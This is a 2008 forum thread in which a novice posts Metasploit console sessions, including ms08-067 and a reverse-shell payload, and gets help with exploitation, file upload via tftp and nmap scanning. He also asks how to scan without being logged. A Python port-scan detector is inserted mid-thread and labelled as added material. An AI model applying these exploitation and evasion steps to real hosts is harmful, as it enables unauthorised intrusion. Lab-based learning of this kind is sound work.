This topic has 21 replies, 7 voices, and was last updated 12 years, 4 months ago by KrisTeason.
November 14, 2008 at 7:15 pm #3010
mr.Z
Participant
I have some problems using Metasploit. I have tested more exploits, but with no success, and I don't know what the problem is.
Look at this example:
use windows/browser/ani_loadimage_chunksize
set SRVHOST myip
set SRVPORT 8000
set URIPATH nono
set payload windows/shell_reverse_tcp
set LHOST ip victim
>exploit
[*] Started reverse handler
[*] Using URL: http://ip:8000/nono
[*] Server started.
Then I tested this on an XP SP box with IE 7 and IE 6.
Then it tells me:
[*] Sending HTML page to ip:6668...
[*] Sending ANI file to ip:6668...
I'm waiting, but nothing happens.
>> sessions -l
Active sessions
===============
No active sessions.
What is the problem???
Any idea?
And can anyone give me some exploits that work on XP SP2 and SP3?
-
November 14, 2008 at 7:45 pm #20579
BillV
Participant
Sounds like it's not vulnerable.
-
November 14, 2008 at 7:58 pm #20580
mr.Z
Participant
Thanks,
but I ran "show targets":
--  ----
0   (Automatic) IE6, IE7 and Firefox on Windows NT, 2000, XP, 2003 and Vista
and I tested on 7 PCs, same problem ;D
-
November 14, 2008 at 9:29 pm #20581
BillV
Participant
Just because those are listed as targets doesn't mean they're vulnerable... just what the exploit can attack.
-
November 14, 2008 at 10:55 pm #20582
mr.Z
Participant
OK, thanks.
But can you give me the names of some exploits that work on Win XP SP1, SP2, SP3 and Vista?
And I want an exploit I can use without sending the URL to the victim.
I'm using MSF under Windows XP.
-
November 15, 2008 at 4:09 am #20583
BillV
Participant
@mr.Z wrote:
I'm using MSF under Windows XP.
There's your first problem. Run it under Linux.
I can't tell you what exploit to use; it depends on what your target is vulnerable to. As you've already figured out how to do, you can see which exploits will work against which targets.
-
November 15, 2008 at 4:26 am #20584
Anonymous
Participant
ms08-067 exploit
-
November 16, 2008 at 7:37 pm #20585
mr.Z
Participant
@BillV wrote:
@mr.Z wrote:
I'm using MSF under Windows XP.
There's your first problem. Run it under Linux.
I can't tell you what exploit to use; it depends on what your target is vulnerable to. As you've already figured out how to do, you can see which exploits will work against which targets.
Thanks a lot. Now I'm working in Linux and have updated MSF.
----
ChrisG, thanks.
I tested this exploit, but it shows me an error message:
[*] Started bind handler
[-] Exploit failed: The connection timed out (ip-vicitm:4444).
[*] Exploit completed, but no session was created.
Why does this not work? What is the problem?
"but no session was created"????
Please tell me.
-
November 17, 2008 at 4:47 am #20586
apollo
Participant
You probably aren't vulnerable to that either, or something was wrong. Since you may not be vulnerable to much, you may want to check out DVL Linux (Damn Vulnerable Linux) and start messing around on there. That might get you further in the process. Or install Windows XP without service packs or patches, and then Metasploit becomes a lot more interesting.
-
November 17, 2008 at 3:25 pm #20587
mr.Z
Participant
@apollo wrote:
You probably aren't vulnerable to that either, or something was wrong. Since you may not be vulnerable to much, you may want to check out DVL Linux (Damn Vulnerable Linux) and start messing around on there. That might get you further in the process. Or install Windows XP without service packs or patches, and then Metasploit becomes a lot more interesting.
You are correct, but I want to test on a fully patched Windows XP.
I have tried a lot, and I see that if port 445 is open then you can use the ms08-067 exploit, but if the Windows XP is fully patched... any more ideas?
-
November 17, 2008 at 6:37 pm #20588
BillV
Participant
@mr.Z wrote:
any more ideas?
Yes, I think you need to do more research and studying regarding exploits and how Metasploit works.
I suggest you start here.
BillV
-
November 17, 2008 at 11:06 pm #20589
apollo
Participant
I'll be slightly more helpful: if you have NO idea what something is vulnerable to, you may want to try a vulnerability scanner like Nessus. There is another option for you to Google, which is db_autopwn. If you search for that, and you use BackTrack 3, things will get easier for you. If you use this approach for evil, you will get caught; it is EXTREMELY noisy and will have a low success rate. If you do find a vulnerability, do a sessions -lv and it will show you what exploit you are vulnerable to.
-
November 18, 2008 at 2:05 am #20590
geekyone
Participant
@mr.Z wrote:
You are correct, but I want to test on a fully patched Windows XP.
I have tried a lot, and I see that if port 445 is open then you can use the ms08-067 exploit, but if the Windows XP is fully patched... any more ideas?
Your biggest problem is trying to exploit a fully patched Windows XP box with Metasploit. If you want to learn more about Metasploit and practice pen-testing techniques, don't attack a fully patched box in your lab.
Metasploit doesn't have any zero-day vulnerabilities included in it (currently), so you are never going to be able to successfully exploit a fully patched box with Metasploit right now. Now, if you really want to exploit a fully patched XP box, you should take BillV's suggestion to heart, because that is going to involve getting into zero-day vulnerability research, which requires an in-depth understanding of how exploits work. If you want to get into that, I recommend starting by reading Hacking: The Art of Exploitation, 2nd Edition.
-
November 22, 2008 at 7:37 pm #20591
mr.Z
Participant
THANK YOU ALL
Now I have installed Windows XP without service packs
and exploited this Windows.
I used the payload
>"windows/shell_reverse_tcp"
>exploit
>Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
But I can't upload a file. I'm using this MSF under Linux.
I tested some commands like this:
>copy /root/xx.txt c:
but it was not successful. The error message:
>copy /root/xx.txt c:
The syntax of the command is incorrect
-
November 22, 2008 at 7:47 pm #20592
KrisTeason
Participant
If you're getting files from a command prompt, you have to get familiar with the tftp command. Remember to start the TFTP server on your Linux box; when requesting the files using tftp, they come from your /tmp directory. You might want to try the meterpreter/shell_reverse_tcp payload and use the upload from there; it's quicker. The meterpreter also has a lot of other useful options as well.
-
November 23, 2008 at 11:23 am #20593
mr.Z
Participant
Now it's OK, I'm using tftp.
Now I have a laptop and scanned it using nmap:
nmap -PN -p 445,21,135,139 192.168.1.1
It says:
Interesting ports on 192.168.1.1:
PORT STATE SERVICE
445/tcp filtered microsoft-ds
135/tcp filtered
.....
What can I do about this problem? I want to exploit this; my OS is Win
-
November 23, 2008 at 2:01 pm #20594
Anonymous
Participant
You'll have to do a UDP scan to see your open UDP port 🙂
-
November 27, 2008 at 6:30 am #20595
mr.Z
Participant
OK, THANK YOU FOR THE EXTRA INFO.
BUT I WANT TO ASK YOU ABOUT THE TOOL NMAP: IF I SCAN, IS IT SAFE? I MEAN, IF I SCAN SOME IP, DOES THE SERVER REGISTER MY IP IN ITS LOG, OR WHAT?
IF YOU HAVE A PARAMETER OR COMMAND FOR NMAP THAT DOESN'T GET REGISTERED IN THE LOG, PLEASE GIVE IT TO ME,
like this:
nmap -sS hostname
If I scan with this, is it SAFE or what?
-
November 27, 2008 at 9:07 am #20596
Anonymous
Participant
Using nmap is not safe; most scans will send packets to the target IP address. What the remote system does with these packets is up to them, but logging, port-scan detection and other techniques may be used to identify the scan.
Jimbob
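To make Jimbob's point concrete from the defender's side, here is an added example (not code from the thread or from nmap) of the kind of port-scan detection a target can run over its own firewall logs. It assumes a simplified iptables-style LOG line format and uses constructed sample lines; the point is that a SYN scan such as nmap -sS still sends one SYN per probed port, each of which the target can log, so a simple "many distinct ports from one source in a short window" threshold catches it.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample lines in a simplified iptables "LOG" style (assumption:
# not real captures). One source probes five ports within two seconds, a
# second source touches only two ports, and a late probe falls outside the window.
SAMPLE_LOG = """\
Nov 27 09:07:01 fw kernel: IN=eth0 SRC=192.168.1.50 DST=192.168.1.1 PROTO=TCP SPT=41001 DPT=21 SYN
Nov 27 09:07:01 fw kernel: IN=eth0 SRC=192.168.1.50 DST=192.168.1.1 PROTO=TCP SPT=41002 DPT=135 SYN
Nov 27 09:07:01 fw kernel: IN=eth0 SRC=192.168.1.50 DST=192.168.1.1 PROTO=TCP SPT=41003 DPT=139 SYN
Nov 27 09:07:02 fw kernel: IN=eth0 SRC=192.168.1.50 DST=192.168.1.1 PROTO=TCP SPT=41004 DPT=445 SYN
Nov 27 09:07:02 fw kernel: IN=eth0 SRC=192.168.1.50 DST=192.168.1.1 PROTO=TCP SPT=41005 DPT=80 SYN
Nov 27 09:07:03 fw kernel: IN=eth0 SRC=192.168.1.77 DST=192.168.1.1 PROTO=TCP SPT=52000 DPT=80 SYN
Nov 27 09:07:09 fw kernel: IN=eth0 SRC=192.168.1.77 DST=192.168.1.1 PROTO=TCP SPT=52001 DPT=443 SYN
Nov 27 09:07:45 fw kernel: IN=eth0 SRC=192.168.1.50 DST=192.168.1.1 PROTO=TCP SPT=41006 DPT=8000 SYN
"""

# Matches the fields this example needs from the assumed log format.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) .*?"
    r"SRC=(?P<src>\S+) DST=(?P<dst>\S+) PROTO=(?P<proto>\S+) "
    r"SPT=\d+ DPT=(?P<dpt>\d+)(?P<flags>.*)$"
)


def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # Syslog timestamps carry no year; only relative distances matter here.
    ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
    flags = m["flags"]
    return {
        "ts": ts,
        "src": m["src"],
        "dst": m["dst"],
        "proto": m["proto"],
        "dpt": int(m["dpt"]),
        # A bare SYN (no ACK) is a new connection attempt, which is what
        # a half-open scan sends to every probed port.
        "syn_only": "SYN" in flags and "ACK" not in flags,
    }


def detect_port_scans(log_text, window_seconds=10, distinct_ports=4):
    """Return {(src, dst): ports} for each source whose bare SYNs reached at least
    `distinct_ports` distinct destination ports on one host within `window_seconds`."""
    recent = defaultdict(deque)  # (src, dst) -> deque of (timestamp, dport)
    alerts = {}
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None or ev["proto"] != "TCP" or not ev["syn_only"]:
            continue
        key = (ev["src"], ev["dst"])
        q = recent[key]
        q.append((ev["ts"], ev["dpt"]))
        # Drop probes that fell out of the sliding window.
        while (ev["ts"] - q[0][0]).total_seconds() > window_seconds:
            q.popleft()
        ports = {dport for _, dport in q}
        if len(ports) >= distinct_ports:
            alerts.setdefault(key, set()).update(ports)
    return alerts


if __name__ == "__main__":
    for (src, dst), ports in detect_port_scans(SAMPLE_LOG).items():
        print(f"possible port scan: {src} -> {dst} ports {sorted(ports)}")
```

Running it flags 192.168.1.50 against 192.168.1.1 for ports 21, 80, 135, 139 and 445; the two probes from 192.168.1.77 and the late probe to 8000 stay below the threshold. The window and port count are the knobs a defender tunes against false positives from legitimate bursty clients.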
-
November 27, 2008 at 9:50 am #20597
mr.Z
Participant
But somebody says that using this command is safe?
nmap -sS -O -v hostname
OK, can you tell me what the solution is?
-
November 27, 2008 at 10:41 am #20598
RoleReversal
Participant
@mr.Z wrote:
But somebody says that using this command is safe?
nmap -sS -O -v hostname
OK, can you tell me what the solution is?
I'm a bit confused; what do you mean by 'safe'?
- liable to crash the target?
- liable to get you arrested?
- liable to start World War 3?
- ...
All (well, OK, most) depend on your hardware, target and situation.
-
November 27, 2008 at 5:09 pm #20599
KrisTeason
Participant
I think he's trying to figure out which scan would be the noisiest and which scan would be safer to run without being logged. You should look into:
http://www.nmap-tutorial.com/
and download the Nmap Tutorial PDF. I just gave it a quick read-through; it tells what parameters you could set in nmap to make it less detectable on hosts.
-